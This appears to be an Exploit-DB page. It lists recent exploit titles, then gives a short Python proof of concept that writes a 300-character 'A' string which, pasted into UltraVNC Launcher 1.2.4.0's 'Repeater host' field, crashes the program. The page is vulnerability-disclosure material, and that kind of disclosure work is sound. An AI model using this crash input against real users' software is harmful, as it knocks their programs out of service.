
17 changes to exploits/shellcodes Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) Frigate 3.36 - Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) Memu Play 7.1.3 - Insecure Folder Permissions Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) Microsoft NET USE win10 - Insufficient Authentication Logic LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit) WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Bolt CMS 3.7.0 - Authenticated Remote Code Execution LimeSurvey 4.1.11 - 'File Manager' Path Traversal pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
23 lines
No EOL
807 B
Python
Executable file
23 lines
No EOL
807 B
Python
Executable file
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
|
|
# Discovery by: chuyreds
|
|
# Discovery Date: 2020-04-05
|
|
# Vendor Homepage: https://www.uvnc.com/
|
|
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
|
|
# Tested Version: 1.2.4.0
|
|
# Vulnerability Type: Local
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
|
|
#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
|
|
#3.- Open UltraVNC Launcher
|
|
#4.- Select "Properties"
|
|
#5.- In "Repeater host" Paste Clipboard
|
|
#6.- Click on "OK"
|
|
#7.- Crashed
|
|
|
|
cod = "\x41" * 300
|
|
|
|
f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |